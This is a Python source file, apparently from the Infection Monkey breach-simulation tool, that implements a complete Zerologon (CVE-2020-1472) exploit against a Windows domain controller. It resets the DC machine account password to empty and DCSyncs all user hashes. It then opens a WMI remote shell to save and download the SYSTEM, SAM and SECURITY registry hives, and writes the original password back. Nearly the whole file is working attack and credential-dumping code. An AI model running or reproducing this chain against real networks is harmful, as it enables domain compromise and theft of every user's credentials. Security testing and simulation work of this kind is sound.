"""
Zerologon, CVE-2020-1472
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and
https://github.com/risksense/zerologon/.
"""

import logging
import os
import re
import tempfile
from binascii import unhexlify
from time import time
from typing import Dict, List, Optional, Sequence, Tuple

import impacket
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5.dtypes import NULL

from common.agent_events import AgentEventTag, CredentialsStolenEvent, PasswordRestorationEvent
from common.credentials import Credentials, LMHash, NTHash, Username
from common.tags import (
    ACCOUNT_MANIPULATION_T1098_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    OS_CREDENTIAL_DUMPING_T1003_TAG,
)
from infection_monkey.i_puppet import ExploiterResult
from infection_monkey.utils.threading import interruptible_iter

from .HostExploiter import HostExploiter
from .zerologon_utils.capture_output import StdoutCapture
from .zerologon_utils.dc_utils import connect_to_dc, get_dc_details
from .zerologon_utils.dump_secrets import DumpSecrets
from .zerologon_utils.options import OptionsForSecretsdump
from .zerologon_utils.wmiexec import Wmiexec

logger = logging.getLogger(__name__)

# Tag that marks every event emitted by this exploiter.
ZEROLOGON_EXPLOITER_TAG = "zerologon-exploiter"

# Tags attached to the CredentialsStolenEvent published for credentials dumped from the DC.
CREDENTIALS_STOLEN_EVENT_TAGS = frozenset(
    (
        ZEROLOGON_EXPLOITER_TAG,
        OS_CREDENTIAL_DUMPING_T1003_TAG,
        ACCOUNT_MANIPULATION_T1098_TAG,
    )
)

# Tags attached to the PasswordRestorationEvent published after trying to restore the DC password.
PASSWORD_RESTORATION_EVENT_TAGS = frozenset((ZEROLOGON_EXPLOITER_TAG,))


class ZerologonExploiter(HostExploiter):
    """
    Exploiter for Zerologon (CVE-2020-1472) against a domain controller's Netlogon service.

    Flow (driven by ``_exploit_host``):
      1. zero-authenticate to Netlogon and set the DC machine account's password to empty;
      2. DCSync the domain's user hashes as the DC machine account;
      3. use those hashes to fetch the DC's registry hives and recover the machine account's
         original NT hash;
      4. write that original hash back so the DC keeps working.
    """

    _EXPLOITED_SERVICE = "Netlogon"
    _EXPLOITER_TAGS = (
        ZEROLOGON_EXPLOITER_TAG,
        OS_CREDENTIAL_DUMPING_T1003_TAG,
        ACCOUNT_MANIPULATION_T1098_TAG,
        EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    )
    _PROPAGATION_TAGS: Tuple[AgentEventTag, ...] = tuple()

    # NTSTATUS STATUS_ACCESS_DENIED: the DC's expected answer to a failed zero-auth attempt.
    ERROR_CODE_ACCESS_DENIED = 0xC0000022

    # All-zero client challenge / client credential used by the zero-authentication handshake.
    _ZERO_CLIENT_CHALLENGE = b"\x00" * 8
    _ZERO_CLIENT_CREDENTIAL = b"\x00" * 8
    # Negotiate flags passed to NetrServerAuthenticate3 (same value as the referenced PoCs).
    _NEGOTIATE_FLAGS = 0x212FFFFF
    # NT hash of the empty password, which is what the exploit sets the machine account to.
    _EMPTY_PASSWORD_NT_HASH = unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0")

    # Matches secretsdump user lines of the form "domain\uid:rid:lmhash:nthash:::".
    # Groups: (domain-qualified user, RID, LM hash, NT hash). The RID must be non-empty
    # because it is converted with int().
    _USER_SECRET_PATTERN = re.compile(r"(\S*):([0-9]+):([a-zA-Z0-9]*):([a-zA-Z0-9]*):::")

    def __init__(self):
        super().__init__()
        self.exploit_info["password_restored"] = None
        # Credentials parsed from the DCSync output, keyed by username (domain stripped).
        self._extracted_creds: Dict[str, Dict] = {}
        # Local scratch directory for the registry hive copies fetched from the DC.
        self._secrets_dir = tempfile.TemporaryDirectory(prefix="zerologon")

    def __del__(self):
        # ``_secrets_dir`` does not exist if ``__init__`` failed before creating it.
        secrets_dir = getattr(self, "_secrets_dir", None)
        if secrets_dir is not None:
            secrets_dir.cleanup()

    def _exploit_host(self) -> ExploiterResult:
        """
        Run the full Zerologon flow against ``self.host``.

        :return: The exploiter result. ``exploitation_success`` is set only if the DC machine
                 account's password was changed; ``exploit_info["password_restored"]`` records
                 whether the original password was written back.
        """
        self.dc_ip, self.dc_name, self.dc_handle = get_dc_details(self.host)

        authenticated, rpc_con, timestamp = self._zero_authenticate()
        if not authenticated:
            logger.info(
                "Zero authentication failed. Target is most likely patched, or an error was "
                "encountered."
            )
            return self.exploit_result

        logger.info("Target vulnerable, changing account password to empty string.")
        try:
            if self._is_interrupted():
                return self.exploit_result

            # Start exploiting attempts.
            logger.debug("Attempting password change.")
            password_changed = self._send_rpc_password_change_request(rpc_con, timestamp)
        finally:
            # Release the authenticated connection on every path, including interruption.
            rpc_con.disconnect()  # type: ignore[union-attr]

        if not password_changed:
            logger.info("System was not exploited.")
            return self.exploit_result

        self.exploit_result.propagation_success = False
        self.exploit_result.exploitation_success = password_changed

        # Restore DC's original password.
        if self._restore_password():
            self.exploit_info["password_restored"] = True
            logger.info("System exploited and password restored successfully.")
        else:
            self.exploit_info["password_restored"] = False
            logger.info("System exploited but couldn't restore password!")

        self.store_extracted_creds_for_exploitation()
        return self.exploit_result

    @staticmethod
    def _disconnect_quietly(rpc_con: rpcrt.DCERPC_v5) -> None:
        # Best-effort release of a Netlogon connection that is no longer needed.
        try:
            rpc_con.disconnect()
        except Exception as err:
            logger.debug(f"Exception occurred while disconnecting from DC: {err}")

    def _zero_authenticate(self) -> Tuple[bool, Optional[rpcrt.DCERPC_v5], float]:
        """
        Attempt to authenticate with the domain controller using an all-zero credential.

        Retries up to ``self.options.max_attempts`` times (stopping early if interrupted) and
        publishes a failed exploitation event for every unsuccessful attempt.

        :return:
            - Whether or not authentication was successful
            - An RPC connection on success, otherwise None (the connection is closed on failure)
            - The timestamp of the last attempt
        """
        # Connect to the DC's Netlogon service.
        timestamp = time()
        try:
            rpc_con = connect_to_dc(self.dc_ip)
        except Exception as err:
            error_message = f"Exception occurred while connecting to DC: {err}"
            logger.info(error_message)
            self._publish_exploitation_event(timestamp, False, error_message=error_message)
            return False, None, timestamp

        # Try authenticating.
        for _ in interruptible_iter(range(0, self.options.max_attempts), self.interrupt):
            timestamp = time()
            try:
                rpc_con_auth_result = self._try_zero_authenticate(rpc_con)
                if rpc_con_auth_result is not None:
                    return True, rpc_con_auth_result, timestamp

                error_message = "Failed to authenticate with domain controller"
                self._publish_exploitation_event(timestamp, False, error_message=error_message)
            except Exception as err:
                error_message = f"Error occured while authenticating to {self.host.ip}: {err}"
                logger.info(error_message)
                self._publish_exploitation_event(timestamp, False, error_message=error_message)
                self._disconnect_quietly(rpc_con)
                return False, None, timestamp

        logger.info(
            "Failed to authenticate to the domain controller after: "
            f"{self.options.max_attempts} tries."
        )
        self._disconnect_quietly(rpc_con)
        return False, None, timestamp

    def _try_zero_authenticate(self, rpc_con: rpcrt.DCERPC_v5) -> Optional[rpcrt.DCERPC_v5]:
        """
        Make a single zero-credential authentication attempt over ``rpc_con``.

        :param rpc_con: A connection to the DC's Netlogon service
        :return: ``rpc_con`` if the DC accepted the all-zero credential, None if it answered
                 STATUS_ACCESS_DENIED
        :raises Exception: On any other error reported by the DC or the RPC layer
        """
        # Send challenge and authentication request.
        nrpc.hNetrServerReqChallenge(
            rpc_con,
            self.dc_handle + "\x00",
            self.dc_name + "\x00",
            self._ZERO_CLIENT_CHALLENGE,
        )

        try:
            server_auth = nrpc.hNetrServerAuthenticate3(
                rpc_con,
                self.dc_handle + "\x00",
                self.dc_name + "$\x00",
                nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                self.dc_name + "\x00",
                self._ZERO_CLIENT_CREDENTIAL,
                self._NEGOTIATE_FLAGS,
            )
            error_code = server_auth["ErrorCode"]
        except nrpc.DCERPCSessionError as ex:
            # STATUS_ACCESS_DENIED is the normal outcome of a failed attempt;
            # anything else probably means some other issue.
            if ex.get_error_code() == self.ERROR_CODE_ACCESS_DENIED:
                return None
            raise Exception(f"Unexpected error code: {ex.get_error_code()}.") from ex
        except Exception as ex:
            raise Exception(f"Unexpected error: {ex}.") from ex

        # Explicit check instead of ``assert``, which is stripped under ``python -O``.
        if error_code != 0:
            raise Exception(f"Unexpected error code: {error_code}.")

        return rpc_con

    def _send_rpc_password_change_request(self, rpc_con, timestamp: float) -> bool:
        """
        Try to set the DC machine account's password to empty and report the outcome.

        :return: True if the DC reported success for the password change
        """
        password_change_attempt_result = self._try_password_change(rpc_con, timestamp)
        return self.assess_password_change_attempt_result(
            password_change_attempt_result, timestamp
        )

    def _try_password_change(self, rpc_con, timestamp: float) -> Optional[object]:
        """
        Send the password-change request; on error, publish a failed exploitation event.

        :return: The DC's response, or None if the request raised
        """
        error_message = ""
        try:
            return self._attempt_password_change(rpc_con)
        except nrpc.DCERPCSessionError as err:
            # Failure should be due to a STATUS_ACCESS_DENIED error.
            # Otherwise, the attack is probably not working.
            if err.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
                error_message = f"Unexpected error code from DC: {err.get_error_code()}"
                logger.info(error_message)
        except Exception as err:
            error_message = f"Unexpected error: {err}"
            logger.info(error_message)

        self._publish_exploitation_event(timestamp, False, error_message=error_message)
        return None

    def _attempt_password_change(self, rpc_con: rpcrt.DCERPC_v5) -> object:
        # NetrServerPasswordSet2 with an all-zero zero-authenticator and an all-zero
        # 516-byte ClearNewPassword buffer.
        request = nrpc.NetrServerPasswordSet2()
        self._set_up_password_change_request(request)

        request["PrimaryName"] = self.dc_handle + "\x00"
        request["ClearNewPassword"] = b"\x00" * 516

        return rpc_con.request(request)

    def _set_up_password_change_request(self, request: nrpc.NDRCALL) -> None:
        """
        Fill the fields shared by NetrServerPasswordSet and NetrServerPasswordSet2 requests:
        the DC machine account, its computer name, the secure channel type and an all-zero
        authenticator.
        """
        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
        authenticator["Credential"] = b"\x00" * 8
        authenticator["Timestamp"] = b"\x00" * 4

        request["AccountName"] = self.dc_name + "$\x00"
        request["ComputerName"] = self.dc_name + "\x00"
        request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
        request["Authenticator"] = authenticator

    def assess_password_change_attempt_result(
        self, password_change_attempt_result, timestamp: float
    ) -> bool:
        """
        Report the password-change response as a login attempt and an exploitation event.

        :param password_change_attempt_result: The DC's response, or a falsy value on failure
        :param timestamp: Timestamp attached to the published event
        :return: True if the response's ErrorCode is 0
        """
        if not password_change_attempt_result:
            return False

        error_code = password_change_attempt_result["ErrorCode"]
        if error_code == 0:
            self.report_login_attempt(result=True, user=self.dc_name)
            logger.info("Password change complete!")
            self._publish_exploitation_event(timestamp, True)
            return True

        self.report_login_attempt(result=False, user=self.dc_name)
        error_message = f"Non-zero return code: {error_code}. Something went wrong."
        logger.info(error_message)
        self._publish_exploitation_event(timestamp, False, error_message=error_message)
        return False

    def _restore_password(self) -> bool:
        """
        Write the DC machine account's original password hash back to the DC.

        This is best-effort: every failure is logged and reported as False rather than raised.

        :return: True if a restoration attempt succeeded, False otherwise
        """
        logger.info("Restoring original password...")

        rpc_con = None
        try:
            # DCSync to get usernames and their passwords' hashes.
            logger.debug("DCSync; getting usernames and their passwords' hashes.")
            user_creds = self.get_all_user_creds()
            if not user_creds:
                raise Exception("Couldn't extract any usernames and/or their passwords' hashes.")

            # Use above extracted credentials to get original DC password's hashes.
            logger.debug("Getting original DC password's NT hash.")
            original_pwd_nthash = self._find_original_pwd_nthash(user_creds)
            if not original_pwd_nthash:
                raise Exception("Couldn't extract original DC password's NT hash.")

            # Connect to the DC's Netlogon service.
            try:
                rpc_con = connect_to_dc(self.dc_ip)
            except Exception as e:
                logger.info(f"Exception occurred while connecting to DC: {str(e)}")
                return False

            # Start restoration attempts.
            logger.debug("Attempting password restoration.")
            if not self._send_restoration_rpc_login_requests(rpc_con, original_pwd_nthash):
                raise Exception("Failed to restore password! Max attempts exceeded?")

            return True

        except Exception as e:
            logger.error(e)
            return False

        finally:
            if rpc_con:
                rpc_con.disconnect()  # type: ignore[attr-defined]

    def _find_original_pwd_nthash(self, user_creds: List[Tuple[str, Dict]]) -> Optional[str]:
        # Try each extracted account in order until one recovers the machine account's hash.
        for username, user_details in user_creds:
            user_pwd_hashes = [user_details["lm_hash"], user_details["nt_hash"]]
            try:
                original_pwd_nthash = self.get_original_pwd_nthash(username, user_pwd_hashes)
            except Exception as e:
                logger.info(f"Credentials didn't work. Exception: {str(e)}")
                continue

            if original_pwd_nthash:
                return original_pwd_nthash

        return None

    def get_all_user_creds(self) -> Optional[List[Tuple[str, Dict]]]:
        """
        DCSync as the DC machine account and collect the dumped user hashes.

        Side effect: populates ``self._extracted_creds``.

        :return: ``(username, {"RID", "lm_hash", "nt_hash"})`` pairs with "Administrator" (if
                 present) first, or None if dumping failed
        """
        try:
            options = OptionsForSecretsdump(
                # format for DC account - "NetBIOSName$@0.0.0.0"
                target=f"{self.dc_name}$@{self.dc_ip}",
                target_ip=self.dc_ip,
                dc_ip=self.dc_ip,
            )

            dumped_secrets = self.get_dumped_secrets(
                remote_name=self.dc_ip, username=f"{self.dc_name}$", options=options
            )

            self._extract_user_creds_from_secrets(dumped_secrets=dumped_secrets)

            # "Administrator" is the most likely to work, so it goes first. ``sorted`` is
            # stable, so every other account keeps its extraction order.
            admin = "Administrator"
            return sorted(self._extracted_creds.items(), key=lambda item: item[0] != admin)

        except Exception as e:
            logger.info(
                f"Exception occurred while dumping secrets to get some username and its "
                f"password's NT hash: {str(e)}"
            )

        return None

    def get_dumped_secrets(
        self,
        remote_name: str = "",
        username: str = "",
        options: Optional[object] = None,
    ) -> List[str]:
        """Run secretsdump with the given options and return its output split into lines."""
        dumper = DumpSecrets(remote_name=remote_name, username=username, options=options)
        return dumper.dump().split("\n")

    def _extract_user_creds_from_secrets(self, dumped_secrets: List[str]) -> None:
        # Parse lines of the form "domain\uid:rid:lmhash:nthash:::" into self._extracted_creds.
        # Lines are stripped first so CRLF output still matches.
        for line in dumped_secrets:
            secret = self._USER_SECRET_PATTERN.fullmatch(line.strip())
            if secret is None:
                continue

            qualified_user, user_rid, lmhash, nthash = secret.groups()
            user = qualified_user.split("\\")[-1]  # we don't want the domain

            self._extracted_creds[user] = {
                "RID": int(user_rid),  # relative identifier
                "lm_hash": lmhash,
                "nt_hash": nthash,
            }

    def store_extracted_creds_for_exploitation(self) -> None:
        """Publish every extracted credential pair as a CredentialsStolenEvent."""
        for user, creds in self._extracted_creds.items():
            self.send_extracted_creds_as_credential_stolen_event(
                user,
                creds["lm_hash"],
                creds["nt_hash"],
            )

    def send_extracted_creds_as_credential_stolen_event(
        self, user: str, lmhash: str, nthash: str
    ) -> None:
        """Publish one user's LM and NT hashes as stolen credentials."""
        extracted_credentials = [
            Credentials(identity=Username(username=user), secret=LMHash(lm_hash=lmhash)),
            Credentials(identity=Username(username=user), secret=NTHash(nt_hash=nthash)),
        ]

        self._publish_credentials_stolen_event(extracted_credentials)

    def _publish_credentials_stolen_event(
        self, extracted_credentials: Sequence[Credentials]
    ) -> None:
        credentials_stolen_event = CredentialsStolenEvent(
            source=self.agent_id,
            target=self.host.ip,
            tags=CREDENTIALS_STOLEN_EVENT_TAGS,
            stolen_credentials=extracted_credentials,
        )
        self.agent_event_publisher.publish(credentials_stolen_event)

    def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> Optional[str]:
        """
        Recover the DC machine account's original NT hash from the DC's registry hives.

        :param username: Account used to open a remote shell on the DC
        :param user_pwd_hashes: ``[lm_hash, nt_hash]`` for ``username``
        :return: The NT hash from the "$MACHINE.ACC" secret, or None if it wasn't found
        :raises Exception: If no remote shell could be started (from ``save_HKLM_keys_locally``)
        """
        if not self.save_HKLM_keys_locally(username, user_pwd_hashes):
            return None

        try:
            options = OptionsForSecretsdump(
                dc_ip=self.dc_ip,
                just_dc=False,
                system=os.path.join(self._secrets_dir.name, "monkey-system.save"),
                sam=os.path.join(self._secrets_dir.name, "monkey-sam.save"),
                security=os.path.join(self._secrets_dir.name, "monkey-security.save"),
            )

            dumped_secrets = self.get_dumped_secrets(remote_name="LOCAL", options=options)
            for secret in dumped_secrets:
                if "$MACHINE.ACC: " in secret:  # format of secret - "$MACHINE.ACC: lmhash:nthash"
                    # strip() guards against trailing whitespace (e.g. CR from CRLF output),
                    # which would otherwise break unhexlify() during restoration.
                    return secret.split(":")[2].strip()

        except Exception as e:
            logger.info(
                f"Exception occurred while dumping secrets to get original DC password's NT "
                f"hash: {str(e)}"
            )

        finally:
            self.remove_locally_saved_HKLM_keys()

        return None

    def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
        """
        Save the SYSTEM, SAM and SECURITY hives on the DC and download them locally.

        The copies on the DC are deleted after the download attempt, and the remote shell is
        closed on every path once it was opened.

        :return: True if all commands ran without raising, False otherwise
        :raises Exception: If a remote shell on the DC could not be started
        """
        logger.info(f"Starting remote shell on victim with user: {username}")

        wmiexec = Wmiexec(
            ip=self.dc_ip,
            username=username,
            hashes=":".join(user_pwd_hashes),
            domain=self.dc_ip,
            secrets_dir=self._secrets_dir,
        )

        remote_shell = wmiexec.get_remote_shell()
        if not remote_shell:
            raise Exception("Could not start remote shell on DC.")

        with StdoutCapture() as output_captor:
            try:
                # Save HKLM keys on victim.
                remote_shell.onecmd(
                    "reg save HKLM\\SYSTEM system.save && "
                    + "reg save HKLM\\SAM sam.save && "
                    + "reg save HKLM\\SECURITY security.save"
                )

                try:
                    # Get HKLM keys locally (can't run these together because it needs to call
                    # do_get()).
                    remote_shell.onecmd("get system.save")
                    remote_shell.onecmd("get sam.save")
                    remote_shell.onecmd("get security.save")
                finally:
                    # Delete saved keys on victim, even if fetching them failed.
                    remote_shell.onecmd("del /f system.save sam.save security.save")

                return True

            except Exception as e:
                logger.info(f"Exception occurred: {str(e)}")

            finally:
                # Close the session on every path; don't let a close error mask the result.
                try:
                    wmiexec.close()
                except Exception as e:
                    logger.info(f"Exception occurred while closing remote shell: {str(e)}")

                info = output_captor.get_captured_stdout_output()
                logger.debug(f"Getting victim HKLM keys via remote shell: {info}")

        return False

    def remove_locally_saved_HKLM_keys(self) -> None:
        """Delete the local hive copies; failures are logged, not raised."""
        for name in ["system", "sam", "security"]:
            path = os.path.join(self._secrets_dir.name, f"monkey-{name}.save")
            try:
                os.remove(path)
            except Exception as e:
                logger.info(f"Exception occurred while removing file {path} from system: {str(e)}")

    def _send_restoration_rpc_login_requests(self, rpc_con, original_pwd_nthash) -> bool:
        """Retry restoration up to ``max_attempts`` times; return True on the first success."""
        for _ in interruptible_iter(range(0, self.options.max_attempts), self.interrupt):
            restoration_attempt_result = self.try_restoration_attempt(rpc_con, original_pwd_nthash)

            if self.assess_restoration_attempt_result(restoration_attempt_result):
                return True

        return False

    def try_restoration_attempt(
        self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
    ) -> Optional[object]:
        """
        Make one restoration attempt, logging unexpected errors.

        :return: The truthy result of ``attempt_restoration`` on success; a falsy value
                 (None or False) otherwise
        """
        try:
            return self.attempt_restoration(rpc_con, original_pwd_nthash)
        except nrpc.DCERPCSessionError as e:
            # Failure should be due to a STATUS_ACCESS_DENIED error.
            # Otherwise, the attack is probably not working.
            if e.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
                logger.info(f"Unexpected error code from DC: {e.get_error_code()}")
        except Exception as e:
            logger.info(f"Unexpected error: {e}")

        return False

    def attempt_restoration(
        self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
    ) -> Optional[object]:
        """
        Zero-authenticate once more and set the machine account's NT hash back to its original.

        :param rpc_con: A connection to the DC's Netlogon service
        :param original_pwd_nthash: Hex-encoded original NT hash of the DC machine account
        :return: ``rpc_con`` if the NetrServerPasswordSet request succeeded, None if it failed
        :raises Exception: If the challenge/authentication exchange fails
        """
        # Send challenge and authentication request.
        server_challenge_response = nrpc.hNetrServerReqChallenge(
            rpc_con, self.dc_handle + "\x00", self.dc_name + "\x00", self._ZERO_CLIENT_CHALLENGE
        )
        server_challenge = server_challenge_response["ServerChallenge"]

        server_auth = nrpc.hNetrServerAuthenticate3(
            rpc_con,
            self.dc_handle + "\x00",
            self.dc_name + "$\x00",
            nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
            self.dc_name + "\x00",
            self._ZERO_CLIENT_CREDENTIAL,
            self._NEGOTIATE_FLAGS,
        )

        # Explicit check instead of ``assert``, which is stripped under ``python -O``.
        if server_auth["ErrorCode"] != 0:
            raise Exception(f"Unexpected error code: {server_auth['ErrorCode']}.")

        # The machine account password is currently empty, so the session key is derived
        # from the empty password's NT hash and the all-zero client challenge.
        session_key = nrpc.ComputeSessionKeyAES(
            None,
            self._ZERO_CLIENT_CHALLENGE,
            server_challenge,
            self._EMPTY_PASSWORD_NT_HASH,
        )

        try:
            nrpc.NetrServerPasswordSetResponse = NetrServerPasswordSetResponse
            nrpc.OPNUMS[6] = (NetrServerPasswordSet, nrpc.NetrServerPasswordSetResponse)

            request = NetrServerPasswordSet()
            self._set_up_password_change_request(request)
            request["PrimaryName"] = NULL
            request["UasNewPassword"] = impacket.crypto.SamEncryptNTLMHash(
                unhexlify(original_pwd_nthash), session_key
            )

            rpc_con.request(request)

        except Exception as e:
            logger.info(f"Unexpected error: {e}")
            # Returning rpc_con here would be reported as a successful restoration.
            return None

        return rpc_con

    def assess_restoration_attempt_result(self, restoration_attempt_result) -> bool:
        """Publish a PasswordRestorationEvent; return True if the attempt result is truthy."""
        if restoration_attempt_result:
            self._publish_password_restoration_event(success=True)
            logger.debug("DC machine account password should be restored to its original value.")
            return True

        self._publish_password_restoration_event(success=False)
        return False

    def _publish_password_restoration_event(self, success: bool):
        password_restoration_event = PasswordRestorationEvent(
            source=self.agent_id,
            target=self.host.ip,
            tags=PASSWORD_RESTORATION_EVENT_TAGS,
            success=success,
        )
        self.agent_event_publisher.publish(password_restoration_event)


class NetrServerPasswordSet(nrpc.NDRCALL):
    """
    NDR request for the Netlogon NetrServerPasswordSet call (opnum 6).

    ``ZerologonExploiter.attempt_restoration`` registers this class in ``nrpc.OPNUMS[6]``.
    It then uses it to send the machine account's original NT hash back to the DC, encrypted
    with the session key, in ``UasNewPassword``.
    """

    opnum = 6
    # impacket (de)serializes these fields in this order; keep it aligned with the protocol.
    structure = (
        ("PrimaryName", nrpc.PLOGONSRV_HANDLE),
        ("AccountName", nrpc.WSTR),
        ("SecureChannelType", nrpc.NETLOGON_SECURE_CHANNEL_TYPE),
        ("ComputerName", nrpc.WSTR),
        ("Authenticator", nrpc.NETLOGON_AUTHENTICATOR),
        ("UasNewPassword", nrpc.ENCRYPTED_NT_OWF_PASSWORD),
    )


class NetrServerPasswordSetResponse(nrpc.NDRCALL):
    """
    NDR response paired with ``NetrServerPasswordSet``.

    ``ZerologonExploiter.attempt_restoration`` installs it as
    ``nrpc.NetrServerPasswordSetResponse``.

    NOTE(review): impacket presumably resolves the response class by appending "Response" to
    the request class name within the request's module. If so, this name must stay in sync
    with ``NetrServerPasswordSet``; confirm before renaming.
    """

    structure = (
        ("ReturnAuthenticator", nrpc.NETLOGON_AUTHENTICATOR),
        ("ErrorCode", nrpc.NTSTATUS),
    )
